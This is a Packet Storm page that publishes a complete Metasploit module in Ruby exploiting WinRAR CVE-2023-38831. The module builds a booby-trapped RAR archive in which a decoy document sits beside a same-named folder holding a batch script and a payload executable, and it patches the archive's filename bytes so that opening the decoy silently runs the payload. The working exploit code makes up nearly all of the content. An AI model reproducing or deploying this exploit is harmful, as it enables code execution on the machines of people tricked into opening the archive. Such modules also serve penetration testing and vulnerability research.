exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WinRAR Remote Code Execution

WinRAR Remote Code Execution
Posted Sep 8, 2023
Authored by Alexander Hagenah | Site metasploit.com

This Metasploit module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

tags | exploit, code execution
advisories | CVE-2023-38831
SHA-256 | 28f3b59d37ee5a8aa6ff17510a7cd49a93cb8fcb3b1027ca4545c6a2e7de6f4f

WinRAR Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WinRAR CVE-2023-38831 Exploit',
'Description' => %q{
This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its
embedded document, the decoy document is executed, leading to code execution.
},
'License' => MSF_LICENSE,
'Author' => ['Alexander "xaitax" Hagenah'],
'References' => [
['CVE', '2023-38831'],
['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
],
'Platform' => ['win'],
'Arch' => [ ARCH_X64, ARCH_X86 ],
'Targets' => [['Windows', {}]],
'Payload' => {
'DisableNops' => true
},
'DisclosureDate' => '2023-08-23',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
])

register_advanced_options([
OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])
])
end

def exploit
Dir.mktmpdir do |temp_dir|
output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
input_file = datastore['INPUT_FILE']
decoy_name = File.basename(input_file)
decoy_ext = ".#{File.extname(input_file)[1..]}"
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'

decoy_dir = File.join(temp_dir, "#{decoy_name}A")
Dir.mkdir(decoy_dir)

payload_path = File.join(decoy_dir, payload_name)
File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }

bat_script = <<~BAT
@echo off
start "" "%~dp0#{payload_name}"
start "" "%~dp0#{decoy_name}"
BAT

bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")
File.write(bat_path, bat_script)

FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))

zip_path = File.join(temp_dir, 'template.zip')
Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
end

content = File.binread(zip_path)
content.gsub!(decoy_ext + 'A', decoy_ext + ' ')
content.gsub!(decoy_ext + 'B', decoy_ext + ' ')

File.binwrite(output_rar, content)

print_good("Created #{output_rar}")
end
end

end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close